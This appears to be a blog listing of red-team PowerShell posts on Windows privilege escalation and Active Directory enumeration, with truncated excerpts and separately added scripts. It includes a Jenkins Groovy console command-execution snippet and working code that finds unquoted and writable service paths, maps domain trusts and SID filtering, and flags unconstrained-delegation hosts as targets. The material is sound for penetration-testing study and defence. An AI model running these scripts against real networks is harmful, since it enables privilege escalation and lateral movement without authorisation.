Powershell * POWERSHELL SECURITY

Local Privilege Escalation Part 2

Assuming Jenkins is already present on the server and we have credentials for it. After logging in, go to:

http://192.168.65.195:8080/script/

Paste the Groovy below into the script console and click Run.

Code :
def sout = new StringBuffer(), serr = new StringBuffer()
def proc = 'whoami'.execute()
proc.consumeProcessOutput(sout, serr)
proc.waitForOrKill(1000)
println "out> $sout err> $serr"

Now try […]

Local Privilege Escalation Part 1

Service issues using PowerUp:

Get services with unquoted paths and a space in the name:

PS C:\Users\victim.SECURITY\Downloads\ > Get-ServiceUnquoted -Verbose

Get services where the current user can write to its binary path or change arguments to the binary:

PS C:\Users\victim.SECURITY\Downloads\ > Get-ModifiableServiceFile -Verbose

Get the services whose configuration […]
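The two PowerUp checks above re-implemented with built-in cmdlets only, as an added example that is not part of the original post or of PowerUp. It reports unquoted service paths whose intermediate directories the current user can write to (what Get-ServiceUnquoted surfaces) and service binaries whose ACL grants the current user write rights (what Get-ModifiableServiceFile surfaces); the function names are the example's own.

```powershell
# Added example, not from the original post or from PowerUp; all function names are the example's own.
# Runs on any Windows host with Get-CimInstance; no modules required.

function Get-ServiceBinary {
    # Pull the executable path out of a service's PathName and say whether it was quoted.
    param([string]$PathName)
    if ($PathName -match '^"([^"]+)"') {
        return [pscustomobject]@{ Path = $Matches[1]; Quoted = $true }
    }
    # Unquoted: the service control manager has to guess where the path ends, which is the
    # whole problem. For the report we take everything up to the first ".exe".
    $m = [regex]::Match($PathName, '^(.+?\.exe)', 'IgnoreCase')
    $path = if ($m.Success) { $m.Groups[1].Value } else { ($PathName -split ' ')[0] }
    return [pscustomobject]@{ Path = $path; Quoted = $false }
}

function Get-UnquotedPathCandidate {
    # For C:\Program Files\My App\svc.exe the SCM tries C:\Program.exe and then
    # "C:\Program Files\My.exe" before the real binary; those are the hijack targets.
    param([string]$Path)
    $parts = $Path -split ' '
    for ($i = 1; $i -lt $parts.Count; $i++) {
        ($parts[0..($i - 1)] -join ' ') + '.exe'
    }
}

function Test-DirectoryWritable {
    # Probe by creating and removing a file: a planted binary needs exactly this right, and the
    # probe sidesteps reasoning about ACL inheritance and nested group membership.
    param([string]$Path)
    if (-not (Test-Path -LiteralPath $Path -PathType Container)) { return $false }
    $probe = Join-Path $Path ([IO.Path]::GetRandomFileName())
    try {
        [IO.File]::WriteAllBytes($probe, [byte[]]@())
        Remove-Item -LiteralPath $probe -Force
        return $true
    } catch { return $false }
}

function Test-FileModifiableByCurrentUser {
    # ACL check for the binary itself: a running service exe is locked against writes, so a
    # write probe would miss it. Match ACEs against the caller's user and group SIDs.
    param([string]$Path)
    if (-not (Test-Path -LiteralPath $Path -PathType Leaf)) { return $false }
    $id     = [Security.Principal.WindowsIdentity]::GetCurrent()
    $sids   = @($id.User.Value) + @($id.Groups | ForEach-Object { $_.Value })
    $wanted = [Security.AccessControl.FileSystemRights]'Write, Modify, FullControl, TakeOwnership, ChangePermissions'
    $allowed = $false
    foreach ($ace in (Get-Acl -LiteralPath $Path).Access) {
        try { $sid = $ace.IdentityReference.Translate([Security.Principal.SecurityIdentifier]).Value } catch { continue }
        if ($sids -notcontains $sid) { continue }
        if (([int]($ace.FileSystemRights -band $wanted)) -eq 0) { continue }
        if ($ace.AccessControlType -eq 'Deny') { return $false }   # an explicit deny wins
        $allowed = $true
    }
    return $allowed
}

function Find-ServiceWeakness {
    foreach ($svc in Get-CimInstance Win32_Service) {
        if (-not $svc.PathName) { continue }
        $bin = Get-ServiceBinary $svc.PathName
        # Get-ServiceUnquoted equivalent: unquoted path containing a space, with a writable hop on the way.
        if (-not $bin.Quoted -and $bin.Path -match ' ') {
            foreach ($target in Get-UnquotedPathCandidate $bin.Path) {
                if (Test-DirectoryWritable (Split-Path $target -Parent)) {
                    [pscustomobject]@{ Service = $svc.Name; Issue = 'UnquotedPath'; Target = $target; RunsAs = $svc.StartName }
                }
            }
        }
        # Get-ModifiableServiceFile equivalent: the binary the service starts is ours to overwrite.
        if (Test-FileModifiableByCurrentUser $bin.Path) {
            [pscustomobject]@{ Service = $svc.Name; Issue = 'ModifiableBinary'; Target = $bin.Path; RunsAs = $svc.StartName }
        }
    }
}

Find-ServiceWeakness | Format-Table -AutoSize
```

RunsAs is included because a hijackable service only matters in proportion to the account it starts under: LocalSystem or a domain account is worth pursuing, a service that runs as the same low-privilege user is not. The directory probe does create and delete a zero-byte file on the target, which an EDR may log; the ACL-based check for the binary has no side effects.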

Domain Enumeration Part 4

Domain Trust Mapping :

Get a list of all domain trusts for the current domain :

PS C:\Users\victim.SECURITY\Downloads\PowerTools-master\PowerTools-master\PowerView> Get-NetDomainTrust
PS C:\Users\victim.SECURITY\Downloads\PowerTools-master\PowerTools-master\PowerView> Get-NetDomainTrust -Domain ujjtest.security.local
PS C:\Users\victim.SECURITY\Downloads\ADModule-master\ADModule-master> Get-ADTrust
PS C:\Users\victim.SECURITY\Downloads\ADModule-master\ADModule-master> Get-ADTrust -Identity setest.local
PS C:\Users\victim.SECURITY\Downloads\ADModule-master\ADModule-master> (Get-ADForest).Domains

Forest Mapping :

Get all global catalogs for the current forest :

Map trusts of a forest :

PS C:\Users\victim.SECURITY\Downloads\PowerTools-master\PowerTools-master\PowerView> […]
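What Get-NetDomainTrust and Get-ADTrust return, read directly from the trustedDomain objects over LDAP, plus the forest domains, global catalogs and forest trusts through System.DirectoryServices, as an added example that is not part of the original post, PowerView or the AD module. It decodes trustDirection and trustAttributes so the properties that matter for cross-trust attacks (direction, transitivity, SID filtering) are visible at a glance. It assumes a domain-joined host; the function names are the example's own, and ujjtest.security.local in the usage lines is only the child domain name reused from the post.

```powershell
# Added example, not from the original post, PowerView or the AD module; function names are the example's own.
# Needs a domain-joined host (or LDAP reachability to the domain passed as -Domain).
Add-Type -AssemblyName System.DirectoryServices

$TrustDirection = @{ 0 = 'Disabled'; 1 = 'Inbound'; 2 = 'Outbound'; 3 = 'Bidirectional' }
$TrustType      = @{ 1 = 'Downlevel(NT4)'; 2 = 'Uplevel(AD)'; 3 = 'MIT Kerberos'; 4 = 'DCE' }
# trustAttributes bit flags (MS-ADTS); QUARANTINED_DOMAIN means SID filtering is enforced.
$TrustAttribute = [ordered]@{
    0x0001 = 'NON_TRANSITIVE'
    0x0002 = 'UPLEVEL_ONLY'
    0x0004 = 'QUARANTINED_DOMAIN'
    0x0008 = 'FOREST_TRANSITIVE'
    0x0010 = 'CROSS_ORGANIZATION'
    0x0020 = 'WITHIN_FOREST'
    0x0040 = 'TREAT_AS_EXTERNAL'
    0x0080 = 'USES_RC4_ENCRYPTION'
}

function ConvertFrom-TrustAttributes {
    param([int]$Value)
    $names = foreach ($bit in $TrustAttribute.Keys) { if ($Value -band $bit) { $TrustAttribute[$bit] } }
    if ($names) { $names -join ',' } else { 'NONE' }
}

function Get-DomainTrustLdap {
    # Equivalent of Get-NetDomainTrust [-Domain x]: every trustedDomain object in the domain partition.
    param([string]$Domain)
    $searcher = [adsisearcher]'(objectClass=trustedDomain)'
    if ($Domain) { $searcher.SearchRoot = [adsi]"LDAP://$Domain" }
    $source = if ($Domain) { $Domain } else { [DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain().Name }
    $null = $searcher.PropertiesToLoad.AddRange([string[]]@(
        'trustPartner', 'trustDirection', 'trustAttributes', 'trustType', 'whenCreated'))
    foreach ($r in $searcher.FindAll()) {
        $p = $r.Properties
        $attrs = [int]@($p['trustattributes'])[0]
        [pscustomobject]@{
            SourceDomain = $source
            TargetDomain = [string]@($p['trustpartner'])[0]
            Direction    = $TrustDirection[[int]@($p['trustdirection'])[0]]
            Type         = $TrustType[[int]@($p['trusttype'])[0]]
            Attributes   = ConvertFrom-TrustAttributes $attrs
            SidFiltering = [bool]($attrs -band 0x4)   # off = SID history is honoured across this trust
            Transitive   = -not ($attrs -band 0x1)
            Created      = @($p['whencreated'])[0]
        }
    }
}

function Get-ForestMap {
    # Equivalent of (Get-ADForest).Domains, the global catalog listing and the forest trust map.
    $forest = [DirectoryServices.ActiveDirectory.Forest]::GetCurrentForest()
    [pscustomobject]@{
        Forest         = $forest.Name
        Domains        = @($forest.Domains | ForEach-Object Name)
        GlobalCatalogs = @($forest.GlobalCatalogs | ForEach-Object Name)
        ForestTrusts   = @($forest.GetAllTrustRelationships() | ForEach-Object {
            '{0} -> {1} ({2}, {3})' -f $_.SourceName, $_.TargetName, $_.TrustDirection, $_.TrustType })
    }
}

Get-DomainTrustLdap | Format-Table -AutoSize
Get-DomainTrustLdap -Domain 'ujjtest.security.local' | Format-Table -AutoSize   # child domain from the post
Get-ForestMap | Format-List
```

Direction is read from the perspective of the domain you queried: an Inbound trust means the partner's principals can authenticate into this domain. SidFiltering is the column to check before planning any SID-history based hop across the trust, and Transitive tells you whether a trust you reach in one hop extends to the trusts behind it.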

Powershell Enum of Active Directory (Part 2)

Get a list of computers in the current domain :

PS C:\Users\victim.SECURITY\Downloads\PowerTools-master\PowerTools-master\PowerView> Get-NetComputer
PS C:\Users\victim.SECURITY\Downloads\PowerTools-master\PowerTools-master\PowerView> Get-NetComputer -OperatingSystem "*"
PS C:\Users\victim.SECURITY\Downloads\PowerTools-master\PowerTools-master\PowerView> Get-NetComputer -Ping
PS C:\Users\victim.SECURITY\Downloads\PowerTools-master\PowerTools-master\PowerView> Get-NetComputer -FullData

AD module :

PS C:\Users\victim.SECURITY\Downloads\ADModule-master\ADModule-master> Get-ADComputer -Filter * | select Name
PS C:\Users\victim.SECURITY\Downloads\ADModule-master\ADModule-master> Get-ADComputer -Filter * -Properties *

Domain enumeration :

Get all the groups in the current domain : […]
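The -OperatingSystem, -Ping and -FullData behaviours of Get-NetComputer re-implemented over LDAP with the built-in [adsisearcher] accelerator, as an added example that is not part of the original post, PowerView or the AD module. It goes one step beyond the excerpt by decoding userAccountControl to flag disabled hosts and hosts trusted for unconstrained delegation, which is the attribute a red teamer reads first from a computer list; the function and parameter names are the example's own, and it assumes a domain-joined host.

```powershell
# Added example, not from the original post, PowerView or the AD module; names are the example's own.
Add-Type -AssemblyName System.DirectoryServices

# userAccountControl bits that matter when reading a computer list.
$UAC_ACCOUNTDISABLE         = 0x0002
$UAC_TRUSTED_FOR_DELEGATION = 0x80000   # unconstrained delegation: the host keeps the TGT of whoever authenticates to it

function Get-DomainComputer {
    param(
        [string]$OperatingSystem = '*',   # LDAP wildcard, same idea as Get-NetComputer -OperatingSystem
        [switch]$Ping,                    # drop hosts that do not answer ICMP, like Get-NetComputer -Ping
        [switch]$FullData,                # return every attribute instead of the summary, like -FullData
        [string]$Domain                   # optional: query another domain's partition
    )
    $searcher = [adsisearcher]"(&(objectCategory=computer)(operatingSystem=$OperatingSystem))"
    $searcher.PageSize = 1000             # paged search; without it the DC caps the answer at 1000 entries
    if ($Domain) { $searcher.SearchRoot = [adsi]"LDAP://$Domain" }
    if (-not $FullData) {
        $null = $searcher.PropertiesToLoad.AddRange([string[]]@(
            'name', 'dnshostname', 'operatingsystem', 'operatingsystemversion',
            'useraccountcontrol', 'lastlogontimestamp', 'serviceprincipalname'))
    }
    foreach ($r in $searcher.FindAll()) {
        $p = $r.Properties
        $name = [string]@($p['name'])[0]
        $fqdn = [string]@($p['dnshostname'])[0]
        $target = if ($fqdn) { $fqdn } else { $name }
        if ($Ping -and -not (Test-Connection -ComputerName $target -Count 1 -Quiet)) { continue }
        if ($FullData) {
            # Flatten the ResultPropertyCollection: one property per LDAP attribute, arrays kept for multi-valued ones.
            $o = [ordered]@{}
            foreach ($k in ($p.PropertyNames | Sort-Object)) {
                $o[$k] = if ($p[$k].Count -eq 1) { @($p[$k])[0] } else { @($p[$k]) }
            }
            [pscustomobject]$o
            continue
        }
        $uac = [int]@($p['useraccountcontrol'])[0]
        # lastLogonTimestamp is replicated and only accurate to roughly 14 days; fine for spotting stale machines.
        $llt = @($p['lastlogontimestamp'])[0]
        [pscustomobject]@{
            Name          = $name
            DnsHostName   = $fqdn
            OS            = [string]@($p['operatingsystem'])[0]
            OSVersion     = [string]@($p['operatingsystemversion'])[0]
            Enabled       = -not ($uac -band $UAC_ACCOUNTDISABLE)
            Unconstrained = [bool]($uac -band $UAC_TRUSTED_FOR_DELEGATION)
            LastLogon     = if ($llt) { [DateTime]::FromFileTime([long]$llt) } else { $null }
            SPNCount      = @($p['serviceprincipalname']).Count
        }
    }
}

# Usage, mirroring the PowerView lines from the post:
Get-DomainComputer | Format-Table -AutoSize
Get-DomainComputer -OperatingSystem '*Server*' -Ping | Format-Table -AutoSize
Get-DomainComputer -FullData | Select-Object -First 1 | Format-List
# Where to look first: live, enabled hosts with unconstrained delegation.
Get-DomainComputer -Ping | Where-Object { $_.Enabled -and $_.Unconstrained }
```

Domain controllers always show Unconstrained = True, which is expected; any other server in that list is a target, because a TGT of any account that authenticates to it (including a domain admin's) is cached there and can be reused. The -Ping switch sends ICMP to every candidate host, which is noisy on a monitored network; the LDAP query itself is a single connection to one domain controller.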